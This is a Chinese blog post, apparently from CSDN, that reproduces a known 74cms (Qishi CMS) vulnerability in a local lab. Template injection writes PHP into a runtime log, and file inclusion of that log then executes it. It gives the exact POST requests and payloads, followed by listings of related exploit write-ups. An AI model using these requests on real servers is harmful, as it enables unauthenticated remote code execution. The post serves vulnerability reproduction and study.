骑士CMS模版注入+文件包含getshell复现

最新推荐文章于 2024-07-22 09:47:28 发布
最新推荐文章于 2024-07-22 09:47:28 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 中间件漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/116299441
版权

声明

好好学习,天天向上

漏洞描述

骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。

骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。

影响范围

骑士 CMS < 6.0.48

复现过程

这里使用6.0.20版本

使用phpstudy小白皮,好用的1P

74cms下载地址

http://www.74cms.com/download/index.html

在这里插入图片描述

环境启动后,访问

http://192.168.31.61/upload/install.php

安装过程还是很简单的

安装后,访问

http://192.168.31.61/upload/index.php

使用火狐hackbar发送POST

http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl

variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

在这里插入图片描述

可以看到日志记录

在这里插入图片描述

包含这条日志,注意路径和日志名称

http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl

variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log

在这里插入图片描述

维梓-
关注
专栏目录
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
nnn2188185的博客
03-19 1473
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
74CMS3.0 宽字节注入后台+任意文件写入获取shell复现
信安小菜鸡的博客
04-30 1079
复现宽字节注入后台 进入后台 任意输入密码,填写正确验证码,开启burp抓包 把拦截的包发送给重发器,修改admin_name如图所示,再点击发送 成功进入后台 复现任意文件写入 如图所示构造post文件名和内容创建模板写入 然后再访问写入路径即可 原理分析 admin_login.php <?php /* * 74cms 锟斤拷录页锟斤拷 * ======================================================================
骑士CMS模版注入+文件包含getshell漏洞复现
玄道的网安博客
12-22 3180
简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统 漏洞概述 公告地址: http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行。 影响版本 骑士 CMS < 6.0.48 环境搭建 ...
帝国CMS审计-后台模板注入导致getshell
ordar123的博客
06-09 584
第一次尝试自己审计代码,小白一个。审计了好长时间,终于皇天不负有心人,找到一处模板注入,最终发现一处代码执行。审计过程:采用关键函数溯源法来找的。全局搜索eval函数在e/class/connect.php代码如图所示,能否利用这个eval函数,关键点在于listtemp和listtemp和listtemp和docode然后全局搜索ReplaceListVars函数,找的使用这个函数的功能点,在e/search/...
骑士cms任意代码执行(CVE-2020-35339)
最新发布
qq_23003811的博客
07-22 131
后台功能风格模板存在任意代码执行,后台账号密码均为adminadmin。1、点击可用模板,burp工具抓包。2、发送payload。
74cms v6.0.48模版注入+文件包含getshell复现
qq_41814777的博客
03-14 5666
漏洞描述 74cms由于函数过滤不严格导致攻击者可以通过构造执行任意代码 影响版本 骑士 CMS < 6.0.48 风险等级 高 漏洞环境搭建 74 cms: 74cms_Home_Setup_v6.0.20.zip 系统:ubuntu18.04.5 php环境:php 5.6 系统镜像:http://old-releases.ubuntu.com/releases/ web源码下载:https://www.74cms.com/download/index.html 准备好后直接把源码放到var/
记一次攻防演练中的若依(thymeleaf 模板注入)getshell
蚁景网安学院
05-27 1139
记一次攻防演练中幸运的从若依弱口令到后台getshell的过程和分析。首先,我会先把目标的二级域名拿去使用搜索引擎来搜索收集到包含这个目标二级域名的三级域名或者四级域名的网站,这样可以快速的定位到你所要测试的漏洞资产。
代码审计之youdiancms最新版getshell漏洞1
08-03
代码审计之youdiancms最新版getshell漏洞 本文将对youdiancms最新版getshell漏洞进行代码...这篇文章详细讲解了youdiancms最新版getshell漏洞的发现和利用过程,包括SQL注入漏洞、绕过登录到getshell过程和getshell
siteserver远程模板下载Getshell漏洞
Jiajiajiang_的博客
03-28 4299
此处不做分析,只做漏洞的复现。 参考:https://www.freebuf.com/articles/web/195105.html 准备工作: 需要一台公网服务器,一个有漏洞的站点(肯定的对8)。 第一步 先写一个马,此处是aspx站点,自然是aspx的马,但因为会有拦截等,所以构造如下的马。 <%@ Page Language="Jscript" Debug=true%&...
include详解 shell_渗透之CMS后台Getshell思路讲解交流
weixin_32068473的博客
12-30 210
前言出于对审计的热爱,最近审了一下某 cms,审出了个后台 getshell,虽然危害不算太大,但是过程很有意思,在这里分享一下。漏洞发现代码审计翻翻找找中找到了,这个函数:function saxue_writefile( $_fileurl, $_data, $_method = "wb" ) {$_fileopen = @fopen( $_fileurl, $_method ); // 尝试...
sql注入pythonpoco_骑士CMS后台SQL注入 | CN-SEC 中文网
weixin_39753213的博客
02-11 194
摘要漏洞文件:admin/admin_feedback.php代码82行:跟下get_report_list:$_GET[‘reporttype’]漏洞文件:admin/admin_feedback.php代码82行:if (!empty($_GET['reporttype'])) { $wheresql=empty($wheres...
骑士CMS SQL注入漏洞
收集盒 Book box
07-02 2433
影响版本: 通杀 程序介绍:  骑士CMS人才系统,PHP人才招聘程序 (www.74cms.com/) 漏洞文件: ajax_output.php预览源代码打印关于1 $category_id=trim($_GET['category_id']);  2  3 if (($category_id+0)>0 && intval($category_id)==$cate
骑士cms最新全局SQL注入(官方奇葩修复案例)
koothon的专栏
07-17 2172
这个漏洞,我们看看骑士怎么修复的 http://wwwcto2uploudpic/Article/201412/359995.html 首先试试带入单引号,用宽字节试试,可以看到显示数据库出错   看看数据库怎么带入的吧 可以看到出错了,单引号被带入sql语句了 居然还可以注入,没有过滤 找到/include/m
骑士CMS4.1.23本地包含漏洞
pygain的博客
02-27 3258
0x00 在骑士CMS最新版的 index.php页面对$type 调用了display方法  这里的display使用的ThinkPHP的模板展示方法 参数后可直接调用安装目录下的任意文件以PHP形式运行 建议通过绕过上传.html或.txt文件 再进行远程包含即可 具体操作如下图 0x01 直接调用不进行审查 0x02 payload 0x03 在回包中
mysql 二次注入_某php开源cms有趣的二次注入
weixin_39748183的博客
02-10 203
原标题:某php开源cms有趣的二次注入 漏洞说明这个漏洞涉及到了mysql中比较有意思的两个知识点以及以table作为二次注入的突破口,非常的有意思。此cms的防注入虽然是很变态的,但是却可以利用mysql的这两个特点绕过防御。本次的漏洞是出现在ndex.class.php中的likejob_action()和saveresumeson_action()函数,由于这两个函数对用户的输入没有进行严...
刷洞2---74cms注入漏洞
river
05-17 2356
基础积累: 1.在我们拿到一套源码的时候,首先需要寻找连接数据库的密码和网站后台的密码。 第一种方法是看文件名,看看有没有明显的config.php global_function.php类似的文件。 第二种方式是全局搜索 &amp;quot;new mysql(&amp;quot; &amp;quot;mysqli_connect(&amp;quot; &amp;quot;new PDO&amp;quot; 这个是php连接数据库的常用操作,
SQL注入
heiseweiye的博客
10-05 474
一、MySQL注入 1. 常用信息查询 常用信息: 当前数据库名称:database() 当前用户:user() current_user() system_user() 当前数据库版本号:@@version version() 系统类型:@@version_compile_os 错误日志存储位置:@@log_error 数据库存储位置:@@datadir 系统数据库: 所有数据库:SELECT ...
PTB-CVE
zip471642048的博客
05-05 1013
文章目录Apache HTTPD 多后缀解析漏洞 Apache HTTPD 多后缀解析漏洞 如果运维人员给.php后缀增加了处理器: AddHandler application/x-httpd-php .php 那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 上传一个以jpg为后缀的一句话木马但是包含.php 会被成功解析成php ...
【漏洞复现-骑士cms-代码执行】vulfocus/骑士cms_cve_2020_35339
10-13 1754
骑士cms-代码执行】植入到可执行的文件中
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值